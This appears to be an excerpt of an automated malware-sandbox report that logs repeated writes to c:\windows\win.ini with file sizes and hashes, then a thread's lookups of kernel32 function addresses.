SHA256: 8aa8ec394f3ca4f585bee31c2069b7f8b3e0e7b73e65d22c3d99ca2b4a6da26c
False
c:\windows\win.ini 3.85 KB MD5: 87b208a2e1bc2ed7a9c5cd009de943ee
SHA1: aeb2b2172b2c91091d631e2cb3a0f3a1268513ba
SHA256: 03de6c92eb232159a323e407b3de881cb472fc669839de632a2579d7d7f22ed5
False
c:\windows\win.ini 3.88 KB MD5: f9927888683b3fac71acb04476fe0731
SHA1: 08191eb4853ec59f2a7cce4484429e9331656389
SHA256: 4e3ead5c35483bec3127fb0b199c368665a886e7ffaec9102fe5cb579559703c
False
c:\windows\win.ini 3.91 KB MD5: 8507afa79041160f3e106f546c695b0a
SHA1: 4bda73ec5e89803df96a5bc1254cf16dc5ccc183
SHA256: 99b8867852d9104fb043ee26416dc8f587df06a9cbf3ba41c4aa0d9f078c9114
False
c:\windows\win.ini 3.93 KB MD5: 3976074cbaaf6171e9f1cf3baa9da1f6
SHA1: 568f6ea7628596ced5c6f26d869aa822c4070b4b
SHA256: 0aa5ab7ce51c4fdced5c5e653b41aadfe29ec0d0f68dd6dcd93c77743fd88e59
False
c:\windows\win.ini 3.96 KB MD5: 951859f0d5cc4fbda1bc7bb49092bd9e
SHA1: a459a52fd5c5315312e430129253fa4b9fbee5db
SHA256: bfad66058c3e34576e31f3b0fa0bc9d27f1d445c49e0773555bf30c75ef0b6b1
False
c:\windows\win.ini 3.98 KB MD5: 225415f0fb6fe1ec43554989fe8077f1
SHA1: 1041d3da66bb9beb80ac779df93ef0a4941614f1
SHA256: 150880881603c1d49ae447b7b2cce77a36505f9fea6231085015b0d0be56e551
False
c:\windows\win.ini 4.01 KB MD5: 2def4346d36c97fcfde684c3f5d2e9cc
SHA1: 8639a61f03ff759422b54133dd717f82226f4930
SHA256: b5537fb624822df8d3b7993dd3057af0d27f1106fd8db25c91e344ab7fa9b856
False
c:\windows\win.ini 4.04 KB MD5: 3bffa0e650b34f5a463ed9e4a0de8b35
SHA1: 958b181a730bce6827909f0b63515da02374e945
SHA256: 76d0b9685adbcc8b44e6de036a0410ac261fa2ce131dcdea3ea8211854c44737
False
c:\windows\win.ini 4.06 KB MD5: 2b053e8ff8c27ccfe0731f894ac23a1d
SHA1: 033b6eefd4efc64f243835aad005dc24967f375f
SHA256: fc3def66b820a6dcfea3afbe18f5112b367f23c0a407596f816aee5b9d5e20ba
False
c:\windows\win.ini 4.09 KB MD5: c3dd89d03bf4aa2a8329d6d3609f8cbf
SHA1: bf16ea1ae54dd4299993f45cf3ed6b6fb3fb7539
SHA256: ec0b34c9453e3eeaf316acdcd31acdbdeea7d3e02223866172e5254af8ffaf49
False
c:\windows\win.ini 4.12 KB MD5: 62e97c8bdf9c27b8b552191806b0d1a9
SHA1: 2999aac3bed98d1cecf162e403468d9b9caaeb01
SHA256: 50a74a17f50199dd1a810ff14e0ded3079cd90ec987d2f172ce49096c2f2fb70
False
c:\windows\win.ini 4.14 KB MD5: 8cb145cbb4602d555bc5a685baded0a9
SHA1: de3b87640fb2e249e0775dd165b72fa467bcdecf
SHA256: cb95b16f24024c158b297e78e3aabf56235fbc97d3d3e4215e4c893601db142e
False
c:\windows\win.ini 4.17 KB MD5: 3a778efbdd64f2dd829f6ae0a3f0930c
SHA1: 92ba22abcc72c7c991b97becc5b7a6df0578f55d
SHA256: c207ba8e45afaa479d57267a3dc6056fc6c4ecb02aa3fb17dc0042123e006b7d
False
c:\windows\win.ini 4.20 KB MD5: bd8576d2906ec033e6e19c49ad21863f
SHA1: d971408937439c932b2ef886d27dc72dd6f25795
SHA256: 68a8e380dad51de993b13049f3dfcee20f48e4e62086e207ea7dbf4d2ff66655
False
c:\windows\win.ini 4.22 KB MD5: 2d0ecdcaf70204830daaa26e1ef0ab16
SHA1: 68769e852420331429b9d9917f946679c069940c
SHA256: 6dc415401ae07fae6c7a14d4c02dc93edda09f5bb1f677beb9179318cf4fe14b
False
c:\windows\win.ini 4.25 KB MD5: 1620382f1b58d3e04e3be709e5b6a101
SHA1: 3b0981f2ac19ef5c79b1f22e9aa8aca4e3510611
SHA256: 770454f0c4e3bc9a336681a14591ee9a58c23c5c43f050e2dfd8eaf23fd2bf7b
False
c:\windows\win.ini 4.27 KB MD5: f2191ade14ec6e87388c1ddc3c4a7112
SHA1: 31896f24650ec46d873cb9382b0ca2ec97fead2a
SHA256: d9384e64e59d50da4cee829a19958efe10bdb0ce460672c38a47f7d0ef5b40aa
False
c:\windows\win.ini 4.30 KB MD5: d6b01e06515e5ec329c72040745fe8ab
SHA1: 18b50cc8f1c0eb2adc5cd0a35217e181e6c300af
SHA256: 5d127f0e238db6ad054e83522ad7c4f89cc857fcc00b2d42227e2d4d026fa6f7
False
c:\windows\win.ini 4.33 KB MD5: f3536ad9a6e12d8c88c00ab1749efa89
SHA1: d457bc4c70ad8f1964c7f930e6c8fbc1259bcb28
SHA256: 2e5a5a3d6f3fc51173d68457c949140f78271d1d5c9f1c71ec742ec392891a95
False
c:\windows\win.ini 4.35 KB MD5: 3dc5d95fd8cf8d75a759276fc69e9976
SHA1: 7b07d198fd71e01afc73a39b14535f32c85a76ec
SHA256: 6bee5385d9e7ea2f9455713098288a4baa4fc249972c1c0929311961ef1a5369
False
c:\windows\win.ini 4.38 KB MD5: 2cea441ea38acb7b9cd3bc27b0dc0698
SHA1: 350a09ae3b6882ab11f9502967c81576d66faa06
SHA256: 7ef37ff85616dd625180d6fef0d76218080b7356ea3b5ce79ddcc05ef9dc2249
False
c:\windows\win.ini 4.41 KB MD5: fed25c76045acffb2ccbc5e45bc10e51
SHA1: 6c531a914c39ccd3ed316f176c278ce1ab139a3a
SHA256: 02c4b6add11bbb832074ec3e29611649f886566be592219e5616f77b1ccbe5c6
False
c:\windows\win.ini 4.43 KB MD5: 6774d09105dbb25647a79350c4a4d693
SHA1: e00eb9fefea0c4542a762f58d278f8165250d434
SHA256: 276d4d7146d063068e4b572c9a179346d0bb36e527e09ca7b9ee15a07e6ab7b6
False
c:\windows\win.ini 4.46 KB MD5: 0a3c1e147a7d26520f9a3938a50ed79b
SHA1: 912b805f865f5dc978bb607921832d671e5c1f76
SHA256: ddc5d13c429474ec6ff5fe2acfdf816d342b06f2bf7a458ff2477790fd012a88
False
c:\windows\win.ini 4.49 KB MD5: 86b19ae089b6317f4fa479c253aea7df
SHA1: ea6480ca676b1353391917f8e1f0362d1540f5a2
SHA256: 421b12192068d461949bef30693f68b9e1eb920f4d3280d68e509746b8bb5e24
False
c:\windows\win.ini 4.51 KB MD5: d994087faa9e4be322a9e7bbea1523f8
SHA1: 6a78b2af1289e935e3fb3ffd6e74c60aefb66af3
SHA256: 5107c1d8219f3b4604abeb5e48b33545f582b62fd0b519145e9ad96cb8c8df4d
False
c:\windows\win.ini 4.54 KB MD5: 4b3be248ba3ce60ac8c110dbc5f29e88
SHA1: a43c330f624498e7533a0dac52573a221282302a
SHA256: 350153157c0712cc28a907d957b0cd0739df7145ad413660978c38950515e059
False
c:\windows\win.ini 4.56 KB MD5: a3d16f6f6b57a63b0ad8740e739a9938
SHA1: b99fd655e9cb4f74e9a3b8d10d009f0a8709350d
SHA256: 3536f7fdcb0320e98180f68b4e8f1fe1ab43aecc2d8c7533123713cb7c4b109d
False
c:\windows\win.ini 4.59 KB MD5: ba768ac66c3ff83115b470fdb363223f
SHA1: c9543079c6a4a66dd3f490ea6c43d1b92c421928
SHA256: 50ffa2312de5b2d58f3e10c6bbf9b049cf66281a9ac216a04323112fb1de9074
False
c:\windows\win.ini 4.62 KB MD5: 3f1c5fd1cb28b099a37cd3bdad45177e
SHA1: 45143e6f6022b2243f792efdaa624f7faa6b9e7f
SHA256: fd42b2649ab1e02ec394046643be275cc1c5950ae985f45a1a21299364daec49
False
c:\windows\win.ini 4.64 KB MD5: 583a6046fe089056a27e602dbc873f60
SHA1: 2bef6c604edd08a983c7136326c4eaad9f16d33d
SHA256: 30218b90e14a6fe7cbe7df747ea65bfcb175beb31a555ebd172073ef706db333
False
c:\windows\win.ini 4.67 KB MD5: 5cab6564a0802fc8ba1e6a4b113aedac
SHA1: fdc840c638ebe1d45d1f063fd15abab787dd1c56
SHA256: 81deefcee78ee43da7095bcf9e6dff77e9594e91d43a5ea6c8b796c05e520589
False
c:\windows\win.ini 4.70 KB MD5: 187c1bac9a2fff2459ecd0838ef0ee4b
SHA1: da443eb3abc8fe633097361f23a50f45fffaa1fa
SHA256: 6a810550028f9e755b72265cc3a929443207caa0109581ca0eab3ebc9ecd57d6
False
c:\windows\win.ini 4.72 KB MD5: 8d3cab5fc1f1945ac86ba376342d86ce
SHA1: e944125a8f9accfc08b8b2c6170d02a65ca82f6e
SHA256: 1114e0a407a5838da8610daa8c5437d0196fcb182812f8fa9543ba9b701c0e2e
False
c:\windows\win.ini 4.75 KB MD5: 76a7f414c404179d8b178a6bc3394213
SHA1: b7a75958d13b369b12b192811083353fb4e80580
SHA256: 2b1055c4d94d8b3b0f2906aa0f9eeda9b1f9acf0da4470dc314104071fde55cb
False
c:\windows\win.ini 4.78 KB MD5: 155a8efb2be158469be795aa86c3636a
SHA1: 035e8dfb7b975522de1b82ea12a5c2c834fe3f98
SHA256: 6fca892cfbf3615a44d478dc1937cfc3b345ab5745980b75a687913b730daea8
False
c:\windows\win.ini 4.80 KB MD5: 661ab74f743a7cb589bb546e301b4c36
SHA1: 00ee6da2291fb6e41032aec0c77239a61022977c
SHA256: 16b3c760a544bd690cd2e6222fb8c1278f9388a18d53941ce3d390a1a3432122
False
c:\windows\win.ini 4.83 KB MD5: 92445dff3f377ec9dd926921648b5ecd
SHA1: e7966e236f9bc94db8ee982d3ce70202700d5cfd
SHA256: 59c3c7260fefd9556fa9a55e053864b279e6e8cbf2f725f9aa55a54737b485f1
False
c:\windows\win.ini 4.85 KB MD5: 4dd71c3595cbe5ead89d36073775f2c8
SHA1: 87e2dbe7eb96013e7e5f862b465a0d90f69bb72f
SHA256: c3dfe1668dbc05e650b77a07cb419516334df96e4a2786429230cc7e6f3b2b51
False
c:\windows\win.ini 4.88 KB MD5: 70a33f2e54abe9f49dc5d1b6f86aef41
SHA1: da336eb52e70ea7b8a2794e72a4dca45e4908247
SHA256: 015d19c8a2d39e6c7f1a4db6c710b32912b30f700275d0901baa27657ce033c1
False
c:\windows\win.ini 4.91 KB MD5: 511d121fc4f4e702a7aa1d7ac4c395db
SHA1: 47d3e063980d50b3d6ee1a2982eafa01fa7131cc
SHA256: cfb6e421519977449f40321eb75e12946443878c52baa91c2af1a48d84c0d03a
False
c:\windows\win.ini 4.93 KB MD5: 428f303435fb54303144b4bba7762f66
SHA1: 6108127fa45dccd933eb87068180b2a4c77e516a
SHA256: e5af5881f00daa84df656cd2cdd1bc3573dcc9285c9b5f5b0bca2aca5b92c888
False
c:\windows\win.ini 4.96 KB MD5: 219eec3e187ac6ecbadc171d1dadc51c
SHA1: 3374991af11e96591741dfa7dc1f19d293a9b51a
SHA256: 6c681ac5ad32fcd738f4a8de2928914607e21e960cb84eed497ab2a3aea7fadc
False
c:\windows\win.ini 4.99 KB MD5: 8156d8ee397207f82b4160959d184f9b
SHA1: 39e8fd29dc477ed7777c76372136dd660818b222
SHA256: dcb3d351e31204c65b0acea6a5de74db49d99053c0ee249e44cb189c5f20659f
False
c:\windows\win.ini 5.01 KB MD5: ad127b67123fa705657c4d02a6b0236f
SHA1: 19175e3e26a75726f2b9d82335b864b07d9608ff
SHA256: c6e3b5ba942d2fa6ab735499cf5776b765d84bcc906287e3d7648bcef55d075c
False
c:\windows\win.ini 5.04 KB MD5: 41fac7b37cce67c7eba0a273f63b09b9
SHA1: 1bc541e3e6e9f166513eae93c31bbcd6cb1f2f9a
SHA256: aebea235688e9e4f13d696c6a84ae391ecefc295d487a4bdf808c8db4365d7dd
False
c:\windows\win.ini 5.07 KB MD5: 03872d3d9062664d4354b757a5bbbada
SHA1: 60f9c09ccb2b573fbc2405fbee03be4bd766cbf1
SHA256: 688ca061edc18619d5bc962d280c78333eb8d9822c2b92ccd46af6059ab6f11b
False
c:\windows\win.ini 5.09 KB MD5: f25714ac76f60894a1df2cf318d3c200
SHA1: a56b04af158f8a2a9fe652c339a8d100a346d969
SHA256: 4ad4588ac63311ee2a05669bc23375903dcc10e20c635b8f382fdcf692c649b7
False
c:\windows\win.ini 5.12 KB MD5: 5aa903a7bc6c73f14e4fffcc01d54e81
SHA1: ba7c6b9c840df1e94a7275b709a76a9eb392e077
SHA256: a443cbf4f5282a464950958fd9a264c85e74d78451c9ff1bdd194195badce099
False
c:\windows\win.ini 5.14 KB MD5: 73e9627ac6595e27dd6d17460d8f6c0b
SHA1: 8c30a11fea3c29f4926d77afad6dc68fbd90a7e9
SHA256: 11c6f0914c6a4d5ac88183bc98d098512b568bf010fad1ad0b3df4fe0660b604
False
c:\windows\win.ini 5.17 KB MD5: aedfa77d5541cde422571cb1c5b2234b
SHA1: 3a2c5611acf4a6f7480c0bf1489e2bc43c87bf8d
SHA256: 5a9eb436e0434c65f8dbab0552a40f77d082e6e15f7d053cffa26d4285ed6285
False
c:\windows\win.ini 5.20 KB MD5: d202daa2f46ddcc1c7ada1dbc7801df5
SHA1: 46fe968472359e6d956aef2bb50a439bf97b3e9f
SHA256: 3c7e3edbd37dab19ef9bb4956242c934cdcc6a56467894bdf43aa16eb10c39b1
False
c:\windows\win.ini 5.22 KB MD5: 1e1a4509b903948e5a204960ea4fef24
SHA1: 54bea3c1a6f956e118f367e4cc787e838012e280
SHA256: d29d8362ea11632a45067d8200de9980bbd86c3e60303522fa9267ee5f80cd78
False
c:\windows\win.ini 5.25 KB MD5: 495390c7a784f076fe0d0d814864c36c
SHA1: e2e8a9dad93f300b8e0d0f430f26628c9937679b
SHA256: a3b2afd2f4f9ecd5de61ff2391e180fe3433e4020504528e579aa56e56c9ae9b
False
c:\windows\win.ini 5.28 KB MD5: 50c8164ba6b62169152e4e9689c7c2f6
SHA1: 49d84e1da3ecf2617672a3c3faa14b0df2811f8a
SHA256: bf0f60614000331c34f1abe5cccf5bf0e789affa73455ed4e38d52476923e74a
False
c:\windows\win.ini 5.30 KB MD5: 01089b42e74ea658e40dc899809914b2
SHA1: 2eacc62044611652bb4280825e9caff0585430a2
SHA256: c942e1e21206b7006b031ddce8b8b90aed9397537e9d072cccd39d6bee741041
False
c:\windows\win.ini 5.33 KB MD5: 6fe1ee940ceab3639ccb331166d3bad4
SHA1: 4091ae4e2d94b3d7a3c9c7442261d4c41f50d4a1
SHA256: ddecb3fba5f68685b151b08612b1cfb11a11d2f194d3e91aa4a6bc8ad7b8b4ee
False
c:\windows\win.ini 5.36 KB MD5: 03bb2e62c6978b8410e184a27b2d6de1
SHA1: 3824145870f62ff945b248736202bf41fdda90f3
SHA256: 101cfa16a6808794a8070733a7c076b9621e2debc85a2502b77f768783dbcc1a
False
c:\windows\win.ini 5.38 KB MD5: c631c355a7ab70e2357381570d0ca856
SHA1: 103c20d1ebe2460f3761da0027c96aaca07b42a8
SHA256: e857d7a75130b53ce2b4622a2d8cc10e20ed6d6ae589b3d5158ae989ae76969f
False
c:\windows\win.ini 5.41 KB MD5: 37c2cff7836695dc20aabcc0fa891431
SHA1: c4b2902cace138fd83c7c4e64faf15c57c4971f2
SHA256: 75da10cb6749a11689168ed4a50065c5cdff5ba6bbe9d56261bcc3c2dde8f122
False
c:\windows\win.ini 5.43 KB MD5: aeccffe613df481038ab8df8b0ef56cb
SHA1: 15e5f5cfb44456d24367aeca6e9ccab16afba423
SHA256: 226add6623ce5db1ad2400170bc64f01e1a26fc1e865fafbd781546d8e2f9eee
False
c:\windows\win.ini 5.46 KB MD5: 30a7040f79fd1f56ca2c7756aad7f099
SHA1: 48abf2549f1f7b75f9245a88d77ec06cde8a60e6
SHA256: d548ffd71256a4be3c32d46d5836df782eb7cd7eda6d2eee16ed45493171bef0
False
c:\windows\win.ini 5.49 KB MD5: f920bca997b9ad322799ab937653bdd7
SHA1: 79625810e28d10ae9803b3c9bb5376f98158f737
SHA256: 37de496f8712fe44750fb119493e2e079dd10f63cd6e046bf9467df2c6dbb649
False
c:\windows\win.ini 5.51 KB MD5: 68eb1d1b1cf2c19030fad72a0012bd39
SHA1: 14a50a6e78ba904e3de760b23eeb4a6bd0c4e5b1
SHA256: bea0add3325edfdcf87c65b2a4a5070ce67a2f4b4c51e8ee237768120660292e
False
c:\windows\win.ini 5.54 KB MD5: acae68642cab8152367454673ea8d80d
SHA1: 1448bde5d52d785868fb9bb2e93bf601772425f2
SHA256: 18ebeec6a74f8d1eb02fd9a68637c69f6e16290d3f86f72d4181141db75a0fff
False
c:\windows\win.ini 5.57 KB MD5: 1bf9f7a92118e95556c9833968dd06c8
SHA1: f1bcaa92c8bba9e4310d16ba760b65c9d00c0194
SHA256: 24ad2db2943c2f6d986844b242b60607021995e31e4459ebe442f6a8eaec22a1
False
c:\windows\win.ini 5.59 KB MD5: 260f035756ac5d7c8bb73abbc3150d7c
SHA1: d48cb11754f5c3fade36787d3214b3644ed99572
SHA256: 0d9077f81610505cdbc4824e72b687a8926853cb8b0b925398d8d5021fac7504
False
c:\windows\win.ini 5.62 KB MD5: a60033569c20a42561cdfad9de67c645
SHA1: ac02cca28f93ee108375111300bcc40e57ab4e64
SHA256: 6bbd821a0b4c58a08ab9f1d39d6393396ee3eeac23f19b006a98d645d68395c1
False
c:\windows\win.ini 5.65 KB MD5: 66c7537dea9877e387b0919ae02ddc21
SHA1: d50f03c655c4d7b185900b5ada97589a71438026
SHA256: abbe536c3bd51dde60df11e0e490997343942ea7d06f7d9cbcdadde4d3918d36
False
c:\windows\win.ini 5.67 KB MD5: 9a0e01d5cb775af8f10a045057b35fc6
SHA1: accddf053d02fb5fd39cf61d980de3519f644fcb
SHA256: ce608e2d6029c4ba9f380451dceacc1841f4a41a9cc6d5de82b760bb9c1e326a
False
c:\windows\win.ini 5.70 KB MD5: 70ab879ee0fbd11f79a3aaf69d2741b6
SHA1: ce24f57bc166813a375fc3d7b7c3dbc13b3d5d90
SHA256: 6567d52c46d199eb56aaa2885cacd00747510ff3aa1ca666adbd1a2e6e4e16c4
False
c:\windows\win.ini 5.72 KB MD5: 386dfc898ff57e60f12df39f47ec3cda
SHA1: aea0f5bb1a1a8248b211d5af36077d17a9a20cb9
SHA256: 764979087ecb66d8d44f47fef2d16d88563290b1f1103bc583ddc890f19bd042
False
c:\windows\win.ini 5.75 KB MD5: 359312044a30af152ed4534c07a77060
SHA1: f69095f0d7f1e3585948eb2c477a2caa777a0465
SHA256: 4bf44b9d78160933dcbea435e0af9efc029343afc6b28ba89b54b5b04777d186
False
c:\windows\win.ini 5.78 KB MD5: 6eb1c68d49e6153b443c4f294a13f369
SHA1: a570943eeb75da379175307dbd3692cf86a2b2f9
SHA256: 8bde592160bd6dd3f6c0b9d7dd3043c8c0dd459f713cec00864e61ea88f7ee26
False
c:\windows\win.ini 5.80 KB MD5: 39cbe980f86bd19f9588178cff07a5ec
SHA1: 1c1214c0e8bb34ce0642e2db67849a5c7f2af0af
SHA256: e3d6776951119616209365046ce447171093f47b6541e265361afb168b3a6ad7
False
c:\windows\win.ini 5.83 KB MD5: 64ee150917e5d8e23d53965ddd6a6203
SHA1: 44253b8c1e3fb1bd775558e214bbd1612cb144dd
SHA256: cd586eed4e7cfb1526250d41035d097ef726b8fa13e1612756d5336b5fd71335
False
c:\windows\win.ini 5.86 KB MD5: 853e865a78ed1732f919f05fe28b3862
SHA1: b279af16e3de9c448e4d24fe546a7f8aea907fd8
SHA256: b15252e9bfc82b6d3f3fa36412d56f2263751f3d76d7343e06772cc5ab31f51f
False
c:\windows\win.ini 5.88 KB MD5: 569a40a7f29434f154b8d7ed1a54e281
SHA1: fe0a804c53591409d13d6d027c253d14b386dbbc
SHA256: fba956a906f72564ca48c9796d0b7d70850da5bfd2b0dcafbc87df9b85573490
False
c:\windows\win.ini 5.91 KB MD5: 091983c8cd436961affce0fb4fab52de
SHA1: 1e7edaa1ceab5c9759108cc6f6ef743c082286e0
SHA256: 59525b74517db9559c47187ff017967f90d845aa31de6c169d532675f25d990e
False
c:\windows\win.ini 5.94 KB MD5: e5881e6a166df224045bf965784a8874
SHA1: 72764d578c8791bac87445e3888f5ebf99ffad38
SHA256: 216b588b9fc8634858d62c1e0ac46244cfb5df1acde4bb242e7ce9e789f3fa51
False
c:\windows\win.ini 5.96 KB MD5: 3eb35183956f10e44794e6d09c1a84a2
SHA1: bf92975815c26b21ea932b87276199ebad87ba5c
SHA256: fc5bea542660eb4ff25f542863b9c901d0e6de11692770cc583b430d0f99974e
False
c:\windows\win.ini 5.99 KB MD5: 28c6ee7f9204f3dac86ecd71e62dc0ba
SHA1: be41c7040b132f81ad8444589b3437e6b1c761d3
SHA256: 196d0d8c7b15242d3b4e7ba63f37dc79f621ce0dd82495feab9be2990baa1b19
False
c:\windows\win.ini 6.01 KB MD5: bef89cd6d715de5a1c403933381c8e0a
SHA1: e700421de780f25b3bf0f5812178ded3ce687c3c
SHA256: 49b1cfcca4dd9b16516a757f09bd9d7b33f05d0ee0e8d5fa88a8c50593ff573b
False
c:\windows\win.ini 6.04 KB MD5: 86699a3cf33a874e0e433fe10ba652b5
SHA1: 7cda66f4eb69bcd3354394476c443d5d25971e34
SHA256: 8c7fb7a6dcf997a9448a653144e264da3787b52fd6bd6cd4be75584863fbb8a8
False
c:\windows\win.ini 6.07 KB MD5: 231356f2eb29af11ae9a8c6a1dd96f6f
SHA1: eb8b43c8b2678c4d8725de520b46cf9d43507794
SHA256: 159b3e27b0db50cfc030dae11c871e753b3322cd771f5c774bfd7c256aeab309
False
c:\windows\win.ini 6.09 KB MD5: e63b9704e703a3f12e05c73316d1f0a5
SHA1: a3eb64b197567a3e14d3a2491d184f529f93ae4b
SHA256: 3455a452617b3b2b0a5c4f6841185a4996d7655809b0aa208c23c428b5561571
False
c:\windows\win.ini 6.12 KB MD5: 5282a83aa8cdf25aff0e219b72421e2a
SHA1: b2556feaac69814648275823b175071c19d6057e
SHA256: feed7a5ee7c4ce99de5bb58708c514ab3c421f143bc834bd1a39f3c7c0823073
False
c:\windows\win.ini 6.15 KB MD5: 30e45aae60aed5a904d615a8a2ba31e5
SHA1: 3274406f40f559461c1dc9e7e9aec626a742d3e1
SHA256: c8a4ecd61a88f26640467916167479e7cc6255afc5607d7030164dfb90fcf7b4
False
c:\windows\win.ini 6.17 KB MD5: 97bfcbcb7d2b220e48d6a940f63ecced
SHA1: b7a62b7436c031f6eb655ccff7f277ecb2d4675f
SHA256: 6d35744f18c5a95e08af7940d7b882a8f28da97f933cc47d9074eb6737470ff3
False
c:\windows\win.ini 6.20 KB MD5: d2cfadf61b92b128c6e3f509d8389cd5
SHA1: 256b57a6d6f1840059281da6a66955854785280f
SHA256: 768813f1f8e72e374fd9aa8654ebdcdc4883fab89d37b153f53c2726d464c224
False
c:\windows\win.ini 6.23 KB MD5: 8c303eba51f9a9f37de74daafc3f2feb
SHA1: f6869fc202d50244c4f86a61853a566149f59a50
SHA256: a9c5e16665c57081ab9f977a692aaf8df4ba1c5debba6fa1a1bc5002602dfa3a
False
c:\windows\win.ini 6.25 KB MD5: e698fc03ddaf6e4af9cd56dc9c5dd868
SHA1: a8686ef34da151729e3e78c83251927d76f6bf38
SHA256: db05596f37f05b6cee2b70623363ceff5c53bc5329ed0740ddb039a873ace2c0
False
c:\windows\win.ini 6.28 KB MD5: f29eec6210a596436ffa6ee3edd3ad2c
SHA1: 2a2ceb8de407dc9c38779acd9cdbfc3c5d065219
SHA256: 355b7b3ec78fa03686db70a090492b7fbf01cbe7ceeed0b234b4edc6248167b3
False
c:\windows\win.ini 6.30 KB MD5: 344834f0e920e3b6e1d85f3b18ca38b7
SHA1: d525b350709ada1470b25700e2ccfed26ba32b3a
SHA256: 94a9aa4deb1e231ed866a2defb95167cffa9cd8917f9446150acf99074781afc
False
c:\windows\win.ini 6.33 KB MD5: 978582d5f01c0976deb903e23a2ce03f
SHA1: 34cac0bc1d127525761621615f6b92f2e7f8357c
SHA256: cd92a5a36cf1e7e0dea0b213dad5cab94ca29a83c74b0f9de0f066c5678ca514
False
c:\windows\win.ini 6.36 KB MD5: ec38e8474ccf633551deaada72176ba3
SHA1: c2d51f2a4d37a497a619bc1855fbc2a23cd62428
SHA256: 106ef4724b3aba241492836d047857390bc6d196a3106de48a5ec2f5a5707a6b
False
c:\windows\win.ini 6.38 KB MD5: 97e39482d74e258b22743c0962f1c12a
SHA1: 0a193f505c41068cdb331feeb77bb0602706b7dc
SHA256: a4c3751901a09e31906d9f71dc65ba01f4a1fbd7f10f35f16f23c5cda1e7d61d
False
c:\windows\win.ini 6.41 KB MD5: 9e6c8addc8f6fa4415a424712373c06f
SHA1: 740b86ecd8ee88806c3e1f62381bc5330551c3fb
SHA256: b38967b7abfa40ef9d5c33401892624bc4c23ade30b420891917f3e62ebe6952
False
c:\windows\win.ini 6.44 KB MD5: 38b1db09743a656c36c3381c8166989e
SHA1: 6649958d35bc90838d89ad28739a4a6c9b844981
SHA256: 0f8fb05f7fa999217233e636848013acb28f130a727045f6bcb6cbd3739fa021
False
c:\windows\win.ini 6.46 KB MD5: 3f43d017cad8c5d851f777c06e976ae7
SHA1: 41f0a7e43a6c7b0d9939034795170ccfe2a35fd0
SHA256: 3f969594c24f0461f24f5f524ed1af4871fa822838d2c9a36b68489f44cde690
False
c:\windows\win.ini 6.49 KB MD5: 6e0ed236b5ec210afa1a4c74856683cb
SHA1: 911ba49f0d098ca874142eaa373e1694925afcdf
SHA256: fb613f0e26bf16ce7664833026101fc92cee5aebf3e809dd0723bb5221e5609d
False
c:\windows\win.ini 6.52 KB MD5: 7535c4e1c975519298c78dcfdc67f916
SHA1: c0a94dda225162f0c16771dee1a2be20e255f3c5
SHA256: 6d5ca9117e071a1e0f422bafceb09cdf75146a43061f6285c88862a7185f7f24
False
c:\windows\win.ini 6.54 KB MD5: e1fcfdd5fa08c09499d1ea876a7cfc58
SHA1: 5070db64e8298f7f9c434f51cafbc2000ae1c6a8
SHA256: e0e3d6be4395504a0efcaa023057e9ad737e541f8a701410a0ab742de6958aec
False
c:\windows\win.ini 6.57 KB MD5: 5eb0b4e95acc57eaa7e970aceefe8249
SHA1: 33e50d5b8e4754db28d6cf51f06fb8a612461c79
SHA256: b5bcb8131897890c1097084b6ccead6b9730850f448a10dea11ba869981d9a5f
False
c:\windows\win.ini 6.59 KB MD5: 0bb32c327524df00791923fe757e139b
SHA1: 8bb7e005d3bbae09a1bd6f408f63b00057fa07b2
SHA256: 09b4a0a48785a1737494b96cf5cb29d0630300171c7f79e5f132700d0be8568f
False
c:\windows\win.ini 6.62 KB MD5: 7d2adbfee2ea0121f877c8c9f584c9cd
SHA1: b62ad169cf2ddf6dc555bdc41bda488d0115769d
SHA256: a94630c6848dfcae4c51a1a8e8eb8ba64191e5da65e248addca71e25d5e60fb3
False
c:\windows\win.ini 6.65 KB MD5: 17dc84a63237499b4dacfe0ce0de5660
SHA1: cce6ca6bf7099e1ec744c22d4dc3dbc250ae6a45
SHA256: a6bc2f0c4a2aa57634041cceebd3aa17897178c90069a0d9029f87dfb8f70b18
False
c:\windows\win.ini 6.67 KB MD5: 92f5596e030ab3d9ea46d8e9520fccaa
SHA1: a6afa556a713de9e7ac0dcdc7b9f5a27315defe2
SHA256: 0d61fa8250bc71c48749cf4b68ea131da6f94f479b337b5ba1a43d5a1e1b9ebc
False
Threads
Thread 0xefc
449 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7768a330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7768f400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x77687580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x77689910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x77696030 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x77695f90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x77695ff0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7768a5d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7768a690 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77c740f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c6d630 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77c6ecf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x77695720 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77c6e140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, address_out = 0x77c6eb60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77ca9990 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77ca5540 True 1
Fn
